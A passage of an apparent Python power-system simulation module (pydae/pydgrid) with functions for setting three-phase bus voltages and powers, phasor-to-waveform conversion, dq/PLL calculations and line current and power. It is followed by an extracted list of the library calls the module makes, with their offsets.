    voltage : real scalar
        phase-phase RMS voltage magnitude
    phase : real scalar
        phase angle in degrees.
Returns
-------
None.
'''
v_a = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase))
v_b = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase-240))
v_c = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase-120))
grid_obj.set_value(f'v_{bus_name}_a_r',v_a.real)
grid_obj.set_value(f'v_{bus_name}_a_i',v_a.imag)
grid_obj.set_value(f'v_{bus_name}_b_r',v_b.real)
grid_obj.set_value(f'v_{bus_name}_b_i',v_b.imag)
grid_obj.set_value(f'v_{bus_name}_c_r',v_c.real)
grid_obj.set_value(f'v_{bus_name}_c_i',v_c.imag)
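# Usage sketch (illustrative only; `grid` and bus 'B1' are assumed names, not from the
# original file): apply a balanced 400 V phase-phase source at 0 degrees.
#
#     set_voltage(grid, 'B1', voltage=400.0, phase=0.0)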
def set_voltages(grid_obj,bus_name,voltages,phases):
'''
    Set new per-phase voltages at a grid feeder bus.
Parameters
----------
grid_obj : object of pydgrid.grid class
bus_name : string
name of the grid feeder bus.
    voltages : list of three real scalars
        phase-neutral RMS voltage magnitudes
    phases : list of three real scalars, or a single real scalar
        phase angles in degrees (a single scalar builds a balanced a-b-c set).
Returns
-------
None.
'''
if isinstance(phases, list):
v_a = voltages[0]*np.exp(1j*np.deg2rad(phases[0]))
v_b = voltages[1]*np.exp(1j*np.deg2rad(phases[1]))
v_c = voltages[2]*np.exp(1j*np.deg2rad(phases[2]))
else:
v_a = voltages[0]*np.exp(1j*np.deg2rad(phases))
v_b = voltages[1]*np.exp(1j*np.deg2rad(phases-240))
v_c = voltages[2]*np.exp(1j*np.deg2rad(phases-120))
grid_obj.set_value(f'v_{bus_name}_a_r',v_a.real)
grid_obj.set_value(f'v_{bus_name}_a_i',v_a.imag)
grid_obj.set_value(f'v_{bus_name}_b_r',v_b.real)
grid_obj.set_value(f'v_{bus_name}_b_i',v_b.imag)
grid_obj.set_value(f'v_{bus_name}_c_r',v_c.real)
grid_obj.set_value(f'v_{bus_name}_c_i',v_c.imag)
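# Usage sketch (illustrative; same assumed `grid` object): write an unbalanced set of
# phase-neutral voltages, one magnitude and one angle per phase.
#
#     set_voltages(grid, 'B1', voltages=[231.0, 225.0, 228.0], phases=[0.0, -120.0, 120.0])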
def phasor2inst(grid_obj,bus_name,magnitude='v',to_bus='',phases=['a','b','c'],Freq = 50,Dt=1e-4):
omega = 2*np.pi*Freq
out = []
if magnitude == 'v':
for ph in phases:
Times = np.arange(0.0,grid_obj.T[-1,0],Dt)
R = grid_obj.get_values(f'{magnitude}_{bus_name}_{ph}_r')
I = grid_obj.get_values(f'{magnitude}_{bus_name}_{ph}_i')
R_ = np.interp(Times,grid_obj.T[:,0],R)
I_ = np.interp(Times,grid_obj.T[:,0],I)
R_I = R_ + 1j*I_
cplx = np.sqrt(2)*np.exp(1j*omega*Times)*R_I
out += [cplx.real]
if magnitude == 'iline':
for ph in phases:
Times = np.arange(0.0,grid_obj.T[-1,0],Dt)
R = grid_obj.get_values(f'i_l_{bus_name}_{to_bus}_{ph}_r')
I = grid_obj.get_values(f'i_l_{bus_name}_{to_bus}_{ph}_i')
R_ = np.interp(Times,grid_obj.T[:,0],R)
I_ = np.interp(Times,grid_obj.T[:,0],I)
R_I = R_ + 1j*I_
cplx = np.sqrt(2)*np.exp(1j*omega*Times)*R_I
out += [cplx.real]
return Times,out
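# Usage sketch (illustrative; `grid` is an assumed simulated model with a time vector grid.T):
# rebuild the instantaneous a- and b-phase voltage waveforms at bus 'B1'.
#
#     Times, (va_t, vb_t) = phasor2inst(grid, 'B1', magnitude='v', phases=['a', 'b'])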
def get_voltage(grid_obj,bus_name,output='v_an_m'):
'''
Get voltage module of a bus.
Parameters
----------
grid_obj : object of pydae class
bus_name : string
name of the bus.
output : string
v_an: a phase to neutral voltage phasor (V).
v_an_m: a phase to neutral RMS voltage (V).
        v_abcn: a, b and c phase-to-neutral voltage phasors (V).
Returns
-------
phase-ground voltage module (V).
'''
if output in ['v_an','v_bn','v_cn']:
v_sub = f'v_{bus_name}_{output[-2]}'
v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i')
return v
if output in ['v_an_m','v_bn_m','v_cn_m']:
        v_sub = f'v_{bus_name}_{output[-4]}'  # e.g. 'v_an_m' -> phase 'a'
v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i')
return np.abs(v)
if output in ['v_abcn']:
v_list = []
for ph in ['a','b','c']:
v_sub = f'v_{bus_name}_{ph}'
v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i')
v_list += [v]
return np.array(v_list).reshape((3,1))
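# Usage sketch (illustrative; `grid` and bus 'B1' are assumed names):
#
#     v_a   = get_voltage(grid, 'B1', output='v_an')    # complex phase-a phasor
#     v_a_m = get_voltage(grid, 'B1', output='v_an_m')  # its RMS magnitude
#     v_abc = get_voltage(grid, 'B1', output='v_abcn')  # 3x1 array of phase phasors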
@numba.njit(cache=True)
def abc2pq(times,v_a,v_b,v_c,i_a,i_b,i_c,omega=2*np.pi*50,theta_0=0.0):
N_t = len(times)
Dt = times[1]-times[0]
p = np.zeros((N_t,1))
q = np.zeros((N_t,1))
for it in range(len(times)):
theta = Dt*it*omega + theta_0
v_abc = np.array([[v_a[it]],[v_b[it]],[v_c[it]]])
T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)],
[-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]])
dq=T_p@v_abc;
v_d = dq[0]
v_q = dq[1]
theta = Dt*it*omega + theta_0
i_abc = np.array([[i_a[it]],[i_b[it]],[i_c[it]]])
T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)],
[-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]])
i_dq=T_p@i_abc;
i_d = i_dq[0]
i_q = i_dq[1]
p[it] = 3/2*(v_d*i_d + v_q*i_q)
q[it] = 3/2*(v_d*i_q - v_q*i_d)
return p,q
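# Usage sketch (illustrative; the 50 Hz waveforms below are synthetic, not from the
# original file). abc2pq takes instantaneous samples and returns instantaneous p, q.
#
#     t   = np.arange(0.0, 0.1, 1e-4)
#     v_a = 230*np.sqrt(2)*np.cos(2*np.pi*50*t)
#     v_b = 230*np.sqrt(2)*np.cos(2*np.pi*50*t - 2*np.pi/3)
#     v_c = 230*np.sqrt(2)*np.cos(2*np.pi*50*t + 2*np.pi/3)
#     p, q = abc2pq(t, v_a, v_b, v_c, 0.1*v_a, 0.1*v_b, 0.1*v_c)  # currents proportional to voltages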
@numba.njit(cache=True)
def abc2dq(times,v_a,v_b,v_c,i_a,i_b,i_c,omega=2*np.pi*50,theta_0=0.0,K_p=0.1,K_i=20.0,T_f=20.0e-3):
N_t = len(times)
Dt = times[1]-times[0]
v_d = np.zeros((N_t,1))
v_q = np.zeros((N_t,1))
i_d = np.zeros((N_t,1))
i_q = np.zeros((N_t,1))
p = np.zeros((N_t,1))
q = np.zeros((N_t,1))
theta = 0.0
xi = 0.0
theta_pll = np.zeros((N_t,1))
omega_pll = np.zeros((N_t,1))
dq = np.zeros((2,1))
idx = np.argmax(times>0.08)
theta_pll[0,0] = theta_0
#omega_pll = np.zeros((N_t,1))
for it in range(len(times)-1):
theta = theta_pll[it,0]
v_abc = np.array([[v_a[it]],[v_b[it]],[v_c[it]]])
i_abc = np.array([[i_a[it]],[i_b[it]],[i_c[it]]])
T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)],
[-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]])
v_dq = T_p@v_abc;
i_dq = T_p@i_abc;
v_d[it+1,0] = v_d[it,0] + Dt/T_f*(v_dq[0,0] - v_d[it,0])
v_q[it+1,0] = v_q[it,0] + Dt/T_f*(v_dq[1,0] - v_q[it,0])
i_d[it+1,0] = i_d[it,0] + Dt/T_f*(i_dq[0,0] - i_d[it,0])
i_q[it+1,0] = i_q[it,0] + Dt/T_f*(i_dq[1,0] - i_q[it,0])
p[it] = 3/2*(v_d[it+1,0] *i_d[it+1,0] + v_q[it+1,0] *i_q[it+1,0] )
q[it] = 3/2*(v_q[it+1,0] *i_d[it+1,0] - v_d[it+1,0] *i_q[it+1,0] )
xi += Dt*v_dq[0,0]
omega_pll[it,0] = K_p * v_dq[0,0] + K_i * xi + omega
theta_pll[it+1,0] += theta_pll[it,0] + Dt*(omega_pll[it,0])
omega_pll[it+1,0] = K_p * v_dq[0,0] + K_i * xi + omega
return theta_pll,omega_pll,v_d,v_q,i_d,i_q,p,q
def change_line(system,bus_j,bus_k, *args,**kwagrs):
line = kwagrs
S_base = system.get_value('S_base')
line_name = f"{bus_j}_{bus_k}"
if 'X_pu' in line:
if 'S_mva' in line: S_line = 1e6*line['S_mva']
R = line['R_pu']*S_base/S_line # in pu of the system base
X = line['X_pu']*S_base/S_line # in pu of the system base
if 'X' in line:
U_base = system.get_value(f'U_{bus_j}_n')
Z_base = U_base**2/S_base
R = line['R']/Z_base # in pu of the system base
X = line['X']/Z_base # in pu of the system base
if 'X_km' in line:
U_base = system.get_value(f'U_{bus_j}_n')
Z_base = U_base**2/S_base
R = line['R_km']*line['km']/Z_base # in pu of the system base
X = line['X_km']*line['km']/Z_base # in pu of the system base
if 'Bs_km' in line:
U_base = system.get_value(f'U_{bus_j}_n')
Z_base = U_base**2/S_base
print('U_base',U_base,'Z_base',Z_base)
Y_base = 1.0/Z_base
Bs = line['Bs_km']*line['km']/Y_base # in pu of the system base
bs = Bs
system.set_value(f'bs_{line_name}',bs)
print(bs)
G = R/(R**2+X**2)
B = -X/(R**2+X**2)
system.set_value(f"g_{line_name}",G)
system.set_value(f"b_{line_name}",B)
def get_line_i(system,bus_from,bus_to,U_kV=66e3):
if f"b_{bus_from}_{bus_to}" in system.params_list:
bus_j = bus_from
bus_k = bus_to
current_direction = 1.0
elif f"b_{bus_to}_{bus_from}" in system.params_list:
bus_j = bus_to
bus_k = bus_from
current_direction = -1.0
else:
print(f'No line from {bus_from} to {bus_to}')
return
line_name = f"{bus_j}_{bus_k}"
V_j_m = system.get_value(f"V_{bus_j}")
theta_j = system.get_value(f"theta_{bus_j}")
V_k_m = system.get_value(f"V_{bus_k}")
theta_k = system.get_value(f"theta_{bus_k}")
V_j = V_j_m*np.exp(1j*theta_j)
V_k = V_k_m*np.exp(1j*theta_k)
Y_jk = system.get_value(f"g_{line_name}") + 1j*system.get_value(f"b_{line_name}")
S_base = system.get_value('S_base')
U_base = system.get_value(f"U_{bus_j}_n")
I_jk_pu = current_direction*Y_jk*(V_j - V_k)
I_base = S_base/(np.sqrt(3)*U_base)
I_jk = I_jk_pu*I_base
return I_jk
def get_line_s(system,bus_from,bus_to,U_kV=66e3):
if f"b_{bus_from}_{bus_to}" in system.params_list:
bus_j = bus_from
bus_k = bus_to
current_direction = 1.0
elif f"b_{bus_to}_{bus_from}" in system.params_list:
bus_j = bus_to
bus_k = bus_from
current_direction = -1.0
else:
print(f'No line from {bus_from} to {bus_to}')
return
line_name = f"{bus_j}_{bus_k}"
V_j_m = system.get_value(f"V_{bus_j}")
theta_j = system.get_value(f"theta_{bus_j}")
V_k_m = system.get_value(f"V_{bus_k}")
theta_k = system.get_value(f"theta_{bus_k}")
V_j = V_j_m*np.exp(1j*theta_j)
V_k = V_k_m*np.exp(1j*theta_k)
Y_jk = system.get_value(f"g_{line_name}") + 1j*system.get_value(f"b_{line_name}")
S_base = system.get_value('S_base')
U_base = system.get_value(f"U_{bus_j}_n")
I_jk_pu = current_direction*Y_jk*(V_j - V_k)
I_base = S_base/(np.sqrt(3)*U_base)
I_jk = I_jk_pu*I_base
S_jk_pu = V_j*np.conj(I_jk_pu)
S_jk = S_base*S_jk_pu
return S_jk
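# Usage sketch (illustrative; assumes `system` holds a solved power flow and the line
# B1-B2 exists in either direction):
#
#     I_12 = get_line_i(system, 'B1', 'B2')   # complex current from B1 to B2 (A)
#     S_12 = get_line_s(system, 'B1', 'B2')   # complex power at the B1 end (VA)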
def set_powers(grid_obj,bus_name,s_cplx,mode='urisi_3ph'):
'''
Function for simplifying the power setting.
Parameters
----------
grid_obj : pydae object
pydae object with grid of type pydgrid.
bus_name : string
        name of the bus to change the power at.
    s_cplx : complex
complex power (negative for load, positive for generated).
Returns
-------
None.
'''
if mode == 'urisi_3ph':
p = s_cplx.real
q = s_cplx.imag
for ph in ['a','b','c']:
grid_obj.set_value(f'p_{bus_name}_{ph}',p/3)
grid_obj.set_value(f'q_{bus_name}_{ph}',q/3)
if mode == 'urisi_abc':
p = s_cplx.real
q = s_cplx.imag
for ph in ['a','b','c']:
grid_obj.set_value(f'p_{bus_name}_{ph}',p/3)
grid_obj.set_value(f'q_{bus_name}_{ph}',q/3) | [
"numpy.sqrt",
"bokeh.plotting.figure",
"numpy.array",
"numpy.sin",
"numpy.arange",
"pydae.tools.get_v",
"numpy.exp",
"numpy.vstack",
"numpy.abs",
"bokeh.io.show",
"json.loads",
"collections.namedtuple",
"numpy.average",
"numpy.conj",
"pydae.tools.get_i",
"numba.njit",
"numpy.argmax",
"numpy.deg2rad",
"bokeh.models.ColumnDataSource",
"numpy.cos",
"numpy.interp",
"bokeh.models.HoverTool",
"numpy.copy",
"bokeh.io.output_notebook",
"numpy.angle",
"numpy.zeros",
"numpy.load"
] | [((32422, 32445), 'bokeh.io.output_notebook', 'output_notebook', (['INLINE'], {}), '(INLINE)\n', (32437, 32445), False, 'from bokeh.io import output_notebook, show\n'), ((38645, 38667), 'numba.njit', 'numba.njit', ([], {'cache': '(True)'}), '(cache=True)\n', (38655, 38667), False, 'import numba\n'), ((39755, 39777), 'numba.njit', 'numba.njit', ([], {'cache': '(True)'}), '(cache=True)\n', (39765, 39777), False, 'import numba\n'), ((32510, 32556), 'bokeh.plotting.figure', 'figure', ([], {'width': '(600)', 'height': '(400)', 'title': '"""Results"""'}), "(width=600, height=400, title='Results')\n", (32516, 32556), False, 'from bokeh.plotting import figure\n'), ((32604, 32643), 'bokeh.models.ColumnDataSource', 'ColumnDataSource', (['grid.transformer_data'], {}), '(grid.transformer_data)\n', (32620, 32643), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((32775, 32807), 'bokeh.models.ColumnDataSource', 'ColumnDataSource', (['grid.line_data'], {}), '(grid.line_data)\n', (32791, 32807), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((32935, 32966), 'bokeh.models.ColumnDataSource', 'ColumnDataSource', (['grid.bus_data'], {}), '(grid.bus_data)\n', (32951, 32966), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((33280, 33287), 'bokeh.io.show', 'show', (['p'], {}), '(p)\n', (33284, 33287), False, 'from bokeh.io import output_notebook, show\n'), ((38797, 38815), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (38805, 38815), True, 'import numpy as np\n'), ((38823, 38841), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (38831, 38841), True, 'import numpy as np\n'), ((39940, 39958), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (39948, 39958), True, 'import numpy as np\n'), ((39968, 39986), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (39976, 39986), True, 'import numpy as np\n'), ((39996, 40014), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40004, 40014), True, 'import numpy as np\n'), ((40024, 40042), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40032, 40042), True, 'import numpy as np\n'), ((40050, 40068), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40058, 40068), True, 'import numpy as np\n'), ((40076, 40094), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40084, 40094), True, 'import numpy as np\n'), ((40144, 40162), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40152, 40162), True, 'import numpy as np\n'), ((40179, 40197), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40187, 40197), True, 'import numpy as np\n'), ((40207, 40223), 'numpy.zeros', 'np.zeros', (['(2, 1)'], {}), '((2, 1))\n', (40215, 40223), True, 'import numpy as np\n'), ((40234, 40257), 'numpy.argmax', 'np.argmax', (['(times > 0.08)'], {}), '(times > 0.08)\n', (40243, 40257), True, 'import numpy as np\n'), ((1124, 1145), 'json.loads', 'json.loads', (['json_data'], {}), '(json_data)\n', (1134, 1145), False, 'import json\n'), ((2343, 2369), 'numpy.copy', 'np.copy', (['V_node[:self.N_v]'], {}), '(V_node[:self.N_v])\n', (2350, 2369), True, 'import numpy as np\n'), ((2390, 2416), 'numpy.copy', 'np.copy', (['V_node[self.N_v:]'], {}), '(V_node[self.N_v:])\n', (2397, 2416), True, 'import numpy as np\n'), ((2671, 2712), 'numpy.vstack', 'np.vstack', (['(self.I_unknown, self.I_known)'], {}), '((self.I_unknown, self.I_known))\n', (2680, 2712), True, 'import numpy as np\n'), ((21247, 21257), 'numpy.sqrt', 
'np.sqrt', (['(3)'], {}), '(3)\n', (21254, 21257), True, 'import numpy as np\n'), ((33069, 33132), 'bokeh.models.HoverTool', 'HoverTool', ([], {'renderers': '[trafo]', 'tooltips': 'grid.transformer_tooltip'}), '(renderers=[trafo], tooltips=grid.transformer_tooltip)\n', (33078, 33132), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((33150, 33204), 'bokeh.models.HoverTool', 'HoverTool', ([], {'renderers': '[lin]', 'tooltips': 'grid.line_tooltip'}), '(renderers=[lin], tooltips=grid.line_tooltip)\n', (33159, 33204), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((33222, 33274), 'bokeh.models.HoverTool', 'HoverTool', ([], {'renderers': '[cr]', 'tooltips': 'grid.bus_tooltip'}), '(renderers=[cr], tooltips=grid.bus_tooltip)\n', (33231, 33274), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((38338, 38347), 'numpy.abs', 'np.abs', (['v'], {}), '(v)\n', (38344, 38347), True, 'import numpy as np\n'), ((38929, 38972), 'numpy.array', 'np.array', (['[[v_a[it]], [v_b[it]], [v_c[it]]]'], {}), '([[v_a[it]], [v_b[it]], [v_c[it]]])\n', (38937, 38972), True, 'import numpy as np\n'), ((39315, 39358), 'numpy.array', 'np.array', (['[[i_a[it]], [i_b[it]], [i_c[it]]]'], {}), '([[i_a[it]], [i_b[it]], [i_c[it]]])\n', (39323, 39358), True, 'import numpy as np\n'), ((40416, 40459), 'numpy.array', 'np.array', (['[[v_a[it]], [v_b[it]], [v_c[it]]]'], {}), '([[v_a[it]], [v_b[it]], [v_c[it]]])\n', (40424, 40459), True, 'import numpy as np\n'), ((40474, 40517), 'numpy.array', 'np.array', (['[[i_a[it]], [i_b[it]], [i_c[it]]]'], {}), '([[i_a[it]], [i_b[it]], [i_c[it]]])\n', (40482, 40517), True, 'import numpy as np\n'), ((43475, 43497), 'numpy.exp', 'np.exp', (['(1.0j * theta_j)'], {}), '(1.0j * theta_j)\n', (43481, 43497), True, 'import numpy as np\n'), ((43510, 43532), 'numpy.exp', 'np.exp', (['(1.0j * theta_k)'], {}), '(1.0j * theta_k)\n', (43516, 43532), True, 'import numpy as np\n'), ((44504, 44526), 'numpy.exp', 'np.exp', (['(1.0j * theta_j)'], {}), '(1.0j * theta_j)\n', (44510, 44526), True, 'import numpy as np\n'), ((44539, 44561), 'numpy.exp', 'np.exp', (['(1.0j * theta_k)'], {}), '(1.0j * theta_k)\n', (44545, 44561), True, 'import numpy as np\n'), ((44868, 44884), 'numpy.conj', 'np.conj', (['I_jk_pu'], {}), '(I_jk_pu)\n', (44875, 44884), True, 'import numpy as np\n'), ((429, 452), 'numpy.load', 'np.load', (['"""matrices.npz"""'], {}), "('matrices.npz')\n", (436, 452), True, 'import numpy as np\n'), ((2132, 2221), 'pydae.tools.get_v', 'get_v', (['self.syst', 'bus_name'], {'phase_name': 'n2a[phase_name]', 'v_type': '"""phasor"""', 'dq_name': '"""ri"""'}), "(self.syst, bus_name, phase_name=n2a[phase_name], v_type='phasor',\n dq_name='ri')\n", (2137, 2221), False, 'from pydae.tools import get_v, get_i, get_s\n'), ((21608, 21654), 'numpy.array', 'np.array', (['[v_an_float, v_bn_float, v_cn_float]'], {}), '([v_an_float, v_bn_float, v_cn_float])\n', (21616, 21654), True, 'import numpy as np\n'), ((21673, 21690), 'numpy.average', 'np.average', (['v_abc'], {}), '(v_abc)\n', (21683, 21690), True, 'import numpy as np\n'), ((23829, 23861), 'numpy.abs', 'np.abs', (['(p_total + 1.0j * q_total)'], {}), '(p_total + 1.0j * q_total)\n', (23835, 23861), True, 'import numpy as np\n'), ((34078, 34092), 'numpy.conj', 'np.conj', (['i_l_a'], {}), '(i_l_a)\n', (34085, 34092), True, 'import numpy as np\n'), ((34111, 34125), 'numpy.conj', 'np.conj', (['i_l_b'], {}), '(i_l_b)\n', (34118, 34125), True, 'import numpy as np\n'), ((34144, 34158), 'numpy.conj', 'np.conj', (['i_l_c'], {}), 
'(i_l_c)\n', (34151, 34158), True, 'import numpy as np\n'), ((34730, 34740), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (34737, 34740), True, 'import numpy as np\n'), ((34788, 34798), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (34795, 34798), True, 'import numpy as np\n'), ((34850, 34860), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (34857, 34860), True, 'import numpy as np\n'), ((36567, 36604), 'numpy.arange', 'np.arange', (['(0.0)', 'grid_obj.T[-1, 0]', 'Dt'], {}), '(0.0, grid_obj.T[-1, 0], Dt)\n', (36576, 36604), True, 'import numpy as np\n'), ((36760, 36797), 'numpy.interp', 'np.interp', (['Times', 'grid_obj.T[:, 0]', 'R'], {}), '(Times, grid_obj.T[:, 0], R)\n', (36769, 36797), True, 'import numpy as np\n'), ((36812, 36849), 'numpy.interp', 'np.interp', (['Times', 'grid_obj.T[:, 0]', 'I'], {}), '(Times, grid_obj.T[:, 0], I)\n', (36821, 36849), True, 'import numpy as np\n'), ((37040, 37077), 'numpy.arange', 'np.arange', (['(0.0)', 'grid_obj.T[-1, 0]', 'Dt'], {}), '(0.0, grid_obj.T[-1, 0], Dt)\n', (37049, 37077), True, 'import numpy as np\n'), ((37235, 37272), 'numpy.interp', 'np.interp', (['Times', 'grid_obj.T[:, 0]', 'R'], {}), '(Times, grid_obj.T[:, 0], R)\n', (37244, 37272), True, 'import numpy as np\n'), ((37287, 37324), 'numpy.interp', 'np.interp', (['Times', 'grid_obj.T[:, 0]', 'I'], {}), '(Times, grid_obj.T[:, 0], I)\n', (37296, 37324), True, 'import numpy as np\n'), ((43776, 43786), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (43783, 43786), True, 'import numpy as np\n'), ((44805, 44815), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (44812, 44815), True, 'import numpy as np\n'), ((2266, 2287), 'numpy.array', 'np.array', (['V_node_list'], {}), '(V_node_list)\n', (2274, 2287), True, 'import numpy as np\n'), ((2598, 2619), 'numpy.array', 'np.array', (['I_node_list'], {}), '(I_node_list)\n', (2606, 2619), True, 'import numpy as np\n'), ((4022, 4108), 'pydae.tools.get_i', 'get_i', (['self.syst', "('vsc_' + bus_name)"], {'phase_name': 'ph', 'i_type': '"""phasor"""', 'dq_name': '"""ri"""'}), "(self.syst, 'vsc_' + bus_name, phase_name=ph, i_type='phasor', dq_name\n ='ri')\n", (4027, 4108), False, 'from pydae.tools import get_v, get_i, get_s\n'), ((7253, 7296), 'collections.namedtuple', 'namedtuple', (['"""tup"""', "['v_ag', 'v_bg', 'v_cg']"], {}), "('tup', ['v_ag', 'v_bg', 'v_cg'])\n", (7263, 7296), False, 'from collections import namedtuple\n'), ((9052, 9127), 'collections.namedtuple', 'namedtuple', (['"""tup"""', "['v_ag', 'v_bg', 'v_cg', 'v_ng', 'v_an', 'v_bn', 'v_cn']"], {}), "('tup', ['v_ag', 'v_bg', 'v_cg', 'v_ng', 'v_an', 'v_bn', 'v_cn'])\n", (9062, 9127), False, 'from collections import namedtuple\n'), ((9226, 9244), 'numpy.array', 'np.array', (['V_sorted'], {}), '(V_sorted)\n', (9234, 9244), True, 'import numpy as np\n'), ((34751, 34768), 'numpy.deg2rad', 'np.deg2rad', (['phase'], {}), '(phase)\n', (34761, 34768), True, 'import numpy as np\n'), ((34809, 34832), 'numpy.deg2rad', 'np.deg2rad', (['(phase - 240)'], {}), '(phase - 240)\n', (34819, 34832), True, 'import numpy as np\n'), ((34871, 34894), 'numpy.deg2rad', 'np.deg2rad', (['(phase - 120)'], {}), '(phase - 120)\n', (34881, 34894), True, 'import numpy as np\n'), ((38605, 38621), 'numpy.array', 'np.array', (['v_list'], {}), '(v_list)\n', (38613, 38621), True, 'import numpy as np\n'), ((2973, 3059), 'pydae.tools.get_i', 'get_i', (['self.syst', "('load_' + bus_name)"], {'phase_name': 'ph', 'i_type': '"""phasor"""', 'dq_name': '"""ri"""'}), "(self.syst, 'load_' + bus_name, phase_name=ph, 
i_type='phasor',\n dq_name='ri')\n", (2978, 3059), False, 'from pydae.tools import get_v, get_i, get_s\n'), ((4425, 4510), 'pydae.tools.get_i', 'get_i', (['self.syst', "('vsc_' + bus_name)"], {'phase_name': 'ph', 'i_type': '"""phasor"""', 'dq_name': '"""r"""'}), "(self.syst, 'vsc_' + bus_name, phase_name=ph, i_type='phasor', dq_name='r'\n )\n", (4430, 4510), False, 'from pydae.tools import get_v, get_i, get_s\n'), ((6218, 6230), 'numpy.conj', 'np.conj', (['i_a'], {}), '(i_a)\n', (6225, 6230), True, 'import numpy as np\n'), ((6260, 6272), 'numpy.conj', 'np.conj', (['i_b'], {}), '(i_b)\n', (6267, 6272), True, 'import numpy as np\n'), ((6302, 6314), 'numpy.conj', 'np.conj', (['i_c'], {}), '(i_c)\n', (6309, 6314), True, 'import numpy as np\n'), ((8001, 8013), 'numpy.conj', 'np.conj', (['i_a'], {}), '(i_a)\n', (8008, 8013), True, 'import numpy as np\n'), ((8043, 8055), 'numpy.conj', 'np.conj', (['i_b'], {}), '(i_b)\n', (8050, 8055), True, 'import numpy as np\n'), ((8085, 8097), 'numpy.conj', 'np.conj', (['i_c'], {}), '(i_c)\n', (8092, 8097), True, 'import numpy as np\n'), ((10747, 10759), 'numpy.abs', 'np.abs', (['I_1a'], {}), '(I_1a)\n', (10753, 10759), True, 'import numpy as np\n'), ((10797, 10809), 'numpy.abs', 'np.abs', (['I_1b'], {}), '(I_1b)\n', (10803, 10809), True, 'import numpy as np\n'), ((10847, 10859), 'numpy.abs', 'np.abs', (['I_1c'], {}), '(I_1c)\n', (10853, 10859), True, 'import numpy as np\n'), ((10897, 10909), 'numpy.abs', 'np.abs', (['I_1n'], {}), '(I_1n)\n', (10903, 10909), True, 'import numpy as np\n'), ((10947, 10959), 'numpy.abs', 'np.abs', (['I_2a'], {}), '(I_2a)\n', (10953, 10959), True, 'import numpy as np\n'), ((10997, 11009), 'numpy.abs', 'np.abs', (['I_2b'], {}), '(I_2b)\n', (11003, 11009), True, 'import numpy as np\n'), ((11047, 11059), 'numpy.abs', 'np.abs', (['I_2c'], {}), '(I_2c)\n', (11053, 11059), True, 'import numpy as np\n'), ((11097, 11109), 'numpy.abs', 'np.abs', (['I_2n'], {}), '(I_2n)\n', (11103, 11109), True, 'import numpy as np\n'), ((11147, 11171), 'numpy.angle', 'np.angle', (['I_1a'], {'deg': '(True)'}), '(I_1a, deg=True)\n', (11155, 11171), True, 'import numpy as np\n'), ((11209, 11233), 'numpy.angle', 'np.angle', (['I_1b'], {'deg': '(True)'}), '(I_1b, deg=True)\n', (11217, 11233), True, 'import numpy as np\n'), ((11271, 11295), 'numpy.angle', 'np.angle', (['I_1c'], {'deg': '(True)'}), '(I_1c, deg=True)\n', (11279, 11295), True, 'import numpy as np\n'), ((11333, 11357), 'numpy.angle', 'np.angle', (['I_1n'], {'deg': '(True)'}), '(I_1n, deg=True)\n', (11341, 11357), True, 'import numpy as np\n'), ((11395, 11419), 'numpy.angle', 'np.angle', (['I_2a'], {'deg': '(True)'}), '(I_2a, deg=True)\n', (11403, 11419), True, 'import numpy as np\n'), ((11457, 11481), 'numpy.angle', 'np.angle', (['I_2b'], {'deg': '(True)'}), '(I_2b, deg=True)\n', (11465, 11481), True, 'import numpy as np\n'), ((11519, 11543), 'numpy.angle', 'np.angle', (['I_2c'], {'deg': '(True)'}), '(I_2c, deg=True)\n', (11527, 11543), True, 'import numpy as np\n'), ((11581, 11605), 'numpy.angle', 'np.angle', (['I_2n'], {'deg': '(True)'}), '(I_2n, deg=True)\n', (11589, 11605), True, 'import numpy as np\n'), ((12145, 12175), 'numpy.exp', 'np.exp', (['(2.0 / 3 * np.pi * 1.0j)'], {}), '(2.0 / 3 * np.pi * 1.0j)\n', (12151, 12175), True, 'import numpy as np\n'), ((15783, 15813), 'numpy.exp', 'np.exp', (['(2.0 / 3 * np.pi * 1.0j)'], {}), '(2.0 / 3 * np.pi * 1.0j)\n', (15789, 15813), True, 